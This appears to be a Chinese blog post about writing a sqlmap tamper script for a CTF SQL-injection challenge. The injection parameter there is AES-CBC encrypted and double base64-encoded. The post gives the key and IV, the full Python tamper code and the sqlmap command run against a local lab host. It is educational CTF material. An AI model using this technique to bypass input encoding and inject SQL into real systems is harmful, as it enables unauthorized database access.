sqlmap tamper 编写练习

@Time: 2018/11/21

前言：

大家应该都知道，SQLMAP是一款注入神器，大多数遇到的SQL注入都可以用它来搞定，而且他是开源的，因此我们也可以编写一些tamper来应对遇到的问题，因为自己写脚本注入实在是太慢了ummmmm

环境：

这里的话，就借用前两天在湖湘杯中遇到的环境，因为比赛的时候有down注入点的源码，其他的index或者数据库都是按照自己的心情乱写的 ：）

这里是用的是win7+phpstudy，附上注入点的源码（这里echo id是我加的。方便观看到效果）

query($sql);
$arr=$info->fetch_assoc();
?>

分析：

这里是正常的页面，可以看到有一个参数id，但是貌似这里的值是被加密的，无法一眼看出来是什么，但是我们可以看到源码，提取到一些我们需要的信息。

这里的话，传进来的参数id，首先会被执行decode函数，然后得到的id再进行sql查询操作，我们再看看decode函数

熟悉AES的兄弟应该能看出来了吧，这里是CBC模式的AES加密，已经给了key和iv值，得到的结果会base64加密两次，最后检验字符串尾部的7位是否等于hxb2018，等于就会返回除却hxb2018外的字符。

现在我们有了如下信息：

1.AES算法
    mode: CBC
    key: ydhaqPQnexoaDuW3
    iv: 2018201920202021
2.base64*2
3.str[:-7] !== 'hxb2018' 

接下来我们就可以写一个AES的加密算法，利用python当然快啦~

    key = 'ydhaqPQnexoaDuW3'
    iv = '2018201920202021'
    cryptor = AES.new(key,AES.MODE_CBC,iv)
    padding = lambda x: x + (16-(len(x)%16 or 16))*'\0'
    plain = padding(text)
    cipher = cryptor.encrypt(plain)

在加密之前要记得将'hxb2018'加进去，之后base64加密即可~

贴上我的tamper代码：

from Crypto.Cipher import AES
from base64 import b64encode
from lib.core.data import kb
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
    pass
def tamper(payload,**kwargs):
    return encrypt(payload)
def encrypt(text):
    text = text+'hxb2018'
    key = 'ydhaqPQnexoaDuW3'
    iv = '2018201920202021'
    cryptor = AES.new(key,AES.MODE_CBC,iv)
    padding = lambda x: x + (16-(len(x)%16 or 16))*'\0'
    plain = padding(text)
    cipher = cryptor.encrypt(plain)
    result = b64encode(b64encode(cipher))
    return result

其中的 PRIORITY 是设置优先级，然后dependencies()是保持脚本整体结构一致（说实话我也不知道干嘛的，，直接按照他的pass就好啦），

写完之后，将其放在kali下面的 /usr/share/sqlmap/tamper 下就好了

最后试验一下~

sqlmap -u "http://192.168.10.200/myweb/sqlInjection/aes_tam/list.php?id=1" --tamper=AES_Tamper.py --dbs --batch

看得出，注入成功了

不过在之前的时候，我sqlmap的语句中，id参数没有写值，就没有成功，也不知道是啥原因，

啊，原因找到了，是我太菜了ummmm

END：）